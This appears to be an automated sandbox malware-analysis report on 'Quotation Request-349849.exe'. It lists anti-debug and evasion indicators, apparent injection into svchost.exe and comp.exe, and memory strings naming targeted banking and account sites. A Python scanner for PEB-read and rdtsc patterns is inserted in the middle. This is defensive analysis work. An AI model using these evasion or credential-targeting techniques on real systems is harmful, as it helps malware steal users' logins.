                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_007F3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | API/Special instruction interceptor: Address: 15EC4BC
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B7096E rdtsc
                Source: C:\Windows\SysWOW64\comp.exe | Window / User API: threadDelayed 9821
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Evaded block: after key decision | graph_0-101243
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-102467
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\comp.exe | API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\comp.exe TID: 8140 | Thread sleep count: 153 > 30
                Source: C:\Windows\SysWOW64\comp.exe TID: 8140 | Thread sleep time: -306000s >= -30000s
                Source: C:\Windows\SysWOW64\comp.exe TID: 8140 | Thread sleep count: 9821 > 30
                Source: C:\Windows\SysWOW64\comp.exe TID: 8140 | Thread sleep time: -19642000s >= -30000s
                Source: C:\Windows\SysWOW64\comp.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\comp.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083445A GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083C6D1 FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_008337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_00833B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_0083BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 6_2_0041C420 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_007D49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: 2-64-111.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 2-64-111.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 2-64-111.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 2-64-111.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 2-64-111.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: 2-64-111.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 2-64-111.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 2-64-111.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 2-64-111.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 2-64-111.6.dr | Binary or memory string: discord.comVMware20,11696492231f
                Source: comp.exe, 00000006.00000002.2558167888.0000000000620000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2034604472.000001A48629C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2-64-111.6.dr | Binary or memory string: global block list test formVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: 2-64-111.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 2-64-111.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 2-64-111.6.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 2-64-111.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: LcmEonpIrfS.exe, 00000007.00000002.2559458302.00000000006AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                Source: 2-64-111.6.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: 2-64-111.6.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 2-64-111.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 2-64-111.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 2-64-111.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 2-64-111.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 2-64-111.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E rdtsc 3_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417743 LdrLoadDll,3_2_00417743
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00843F09 BlockInput,0_2_00843F09
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007D3B3A
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00805A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00805A7C
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D4B37 LoadLibraryA,GetProcAddress,0_2_007D4B37
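The DebugPort queries, the rdtsc call and the many `mov eax, dword ptr fs:[00000030h]` rows that follow in this report all reduce to a handful of byte patterns in 32-bit code: `64 A1 30 00 00 00` / `64 8B xx 30 00 00 00` fetch the PEB pointer from the TEB, and `0F 31` is rdtsc. The scanner below is an added example, not Joe Sandbox code, that finds those patterns in a raw code buffer and, for each PEB read, names the PEB field dereferenced next, which is what separates an inline `BeingDebugged` check from an `Ldr` walk used to resolve APIs by hand. The sample bytes are hand-assembled for the example and are not taken from the analysed binary; the field offsets are those of the 32-bit PEB, and the scan is a linear byte match rather than a disassembly, so a hit inside an immediate or inline data is possible.

```python
"""Byte-pattern scanner for the PEB-read and rdtsc signatures in this report.

Added example (not Joe Sandbox code). Linear scan of raw x86 code bytes, not
a real disassembly: treat hits as triage leads, not proof.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

# 32-bit PEB fields a stub typically touches right after fetching the PEB
# pointer: BeingDebugged / NtGlobalFlag for anti-debug, Ldr for walking the
# loaded-module list to resolve APIs by hand, ProcessHeap for heap-flag checks.
PEB32_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

PEB_PTR32 = b"\x30\x00\x00\x00"   # TEB+0x30 holds the PEB pointer on 32-bit Windows
PEB_PTR64 = b"\x60\x00\x00\x00"   # TEB+0x60 holds the PEB pointer on 64-bit Windows


@dataclass
class Hit:
    offset: int              # byte offset of the instruction in the buffer
    kind: str                # "peb32", "peb64" or "rdtsc"
    reg: Optional[str]       # register that receives the PEB pointer
    field: Optional[str]     # PEB field dereferenced next, when recognised


def field_hint32(code: bytes, start: int, reg: int) -> Optional[str]:
    """Look a few bytes past a PEB read for the first [reg + disp8] memory
    operand (mov / movzx / cmp / test forms) and name the 32-bit PEB field."""
    if reg == 4:                      # esp as base needs a SIB byte; not handled
        return None
    window = code[start:start + 16]
    j = 0
    while j + 2 < len(window):
        op = window[j]
        if op in (0x8B, 0x8A, 0x80, 0xF6):          # mov r32 / mov r8 / cmp / test
            modrm_at = j + 1
        elif op == 0x0F and window[j + 1] == 0xB6:  # movzx r32, byte ptr [..]
            modrm_at = j + 2
        else:
            j += 1
            continue
        if modrm_at + 1 >= len(window):
            break
        modrm = window[modrm_at]
        if (modrm >> 6) == 1 and (modrm & 7) == reg:   # mod=01: [base + disp8]
            disp = window[modrm_at + 1]
            return PEB32_FIELDS.get(disp, "+0x%02x" % disp)
        j += 1
    return None


def scan(code: bytes) -> List[Hit]:
    """Find TEB-relative PEB pointer reads and rdtsc in a raw code buffer."""
    hits: List[Hit] = []
    i, n = 0, len(code)
    while i < n:
        # 64 A1 30 00 00 00            mov eax, dword ptr fs:[30h]  (moffs32 form)
        if code[i:i + 2] == b"\x64\xA1" and code[i + 2:i + 6] == PEB_PTR32:
            hits.append(Hit(i, "peb32", "eax", field_hint32(code, i + 6, 0)))
            i += 6
            continue
        # 64 8B /r, ModRM mod=00 rm=101 (disp32): mov r32, dword ptr fs:[30h]
        if (code[i:i + 2] == b"\x64\x8B" and i + 7 <= n
                and (code[i + 2] & 0xC7) == 0x05 and code[i + 3:i + 7] == PEB_PTR32):
            reg = (code[i + 2] >> 3) & 7
            hits.append(Hit(i, "peb32", REG32[reg], field_hint32(code, i + 7, reg)))
            i += 7
            continue
        # 65 48 8B /r, SIB 25 (disp32, no base): mov r64, qword ptr gs:[60h]
        if (code[i:i + 3] == b"\x65\x48\x8B" and i + 9 <= n
                and (code[i + 3] & 0xC7) == 0x04 and code[i + 4] == 0x25
                and code[i + 5:i + 9] == PEB_PTR64):
            reg = (code[i + 3] >> 3) & 7
            hits.append(Hit(i, "peb64", REG64[reg], None))
            i += 9
            continue
        # 0F 31                        rdtsc (timing check)
        if code[i:i + 2] == b"\x0F\x31":
            hits.append(Hit(i, "rdtsc", None, None))
            i += 2
            continue
        i += 1
    return hits


def summarize(hits: List[Hit]) -> Dict[str, int]:
    """Count hits per kind, the rollup a signature row in the report gives."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.kind] = counts.get(h.kind, 0) + 1
    return counts


# Constructed sample, hand-assembled for this example (not bytes from the
# analysed binary):
#   64 A1 30 00 00 00            mov   eax, fs:[30h]
#   0F B6 40 02                  movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
#   85 C0                        test  eax, eax
#   64 8B 0D 30 00 00 00         mov   ecx, fs:[30h]
#   8B 49 0C                     mov   ecx, [ecx+0Ch]          ; PEB.Ldr
#   0F 31                        rdtsc
#   A1 30 00 00 00               mov   eax, [30h]              ; no FS prefix: not a PEB read
#   65 48 8B 04 25 60 00 00 00   mov   rax, gs:[60h]
SAMPLE = bytes.fromhex(
    "64A130000000" "0FB64002" "85C0" "648B0D30000000" "8B490C"
    "0F31" "A130000000" "65488B042560000000"
)

if __name__ == "__main__":
    for h in scan(SAMPLE):
        where = {"peb32": "fs:[30h]", "peb64": "gs:[60h]", "rdtsc": "rdtsc"}[h.kind]
        print("offset 0x%04x: %s -> %s, next field %s" % (h.offset, where, h.reg, h.field))
    print(summarize(scan(SAMPLE)))
```

Run it over a dumped code section (for instance the unpacked region the `3_2_03B…` addresses above live in) rather than the whole file; a section with thousands of fs:[30h] reads that all go on to `Ldr` is a hand-rolled import resolver, while a handful that touch `BeingDebugged` or `NtGlobalFlag` is the anti-debug check the sandbox's DebugPort and IsDebuggerPresent rows point at.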
Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_015EB108 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_015EC728 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Request-349849.exe | Code function: 0_2_015EC788 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B5438F mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h] (x3); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BD43D4 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BEC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03C0634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B50310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BD437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h] (x3); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h] (x5); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BFA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BD8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h] (x15)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B402A0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03C062D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h] (x5); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B6E284 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03C0625D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h] (x12)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B36259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BEA250 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB8243 mov eax, dword ptr fs:[00000030h] (x1); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03C061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B70185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BEC188 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BD4180 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] (x4); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BF61C3 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B60124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03C04164 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h] (x3); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BF0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h] (x6); mov ecx, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BC8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B36154 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h] (x4); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BF60B8 mov eax, dword ptr fs:[00000030h] (x1); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B280A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BC80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B3208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB60E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BC6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B2C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B5C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B32050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BE47A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BD678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B347FB mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B527ED mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BB07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B6273C mov eax, dword ptr fs:[00000030h] (x2); mov ecx, dword ptr fs:[00000030h] (x1)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03BAC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B6C720 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B30710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B60710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B6C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B38770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h] (x12)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B30750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBE75D mov eax, dword ptr fs:[00000030h]3_2_03BBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72750 mov eax, dword ptr fs:[00000030h]3_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72750 mov eax, dword ptr fs:[00000030h]3_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB4755 mov eax, dword ptr fs:[00000030h]3_2_03BB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6674D mov esi, dword ptr fs:[00000030h]3_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6674D mov eax, dword ptr fs:[00000030h]3_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6674D mov eax, dword ptr fs:[00000030h]3_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B666B0 mov eax, dword ptr fs:[00000030h]3_2_03B666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]3_2_03B6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34690 mov eax, dword ptr fs:[00000030h]3_2_03B34690
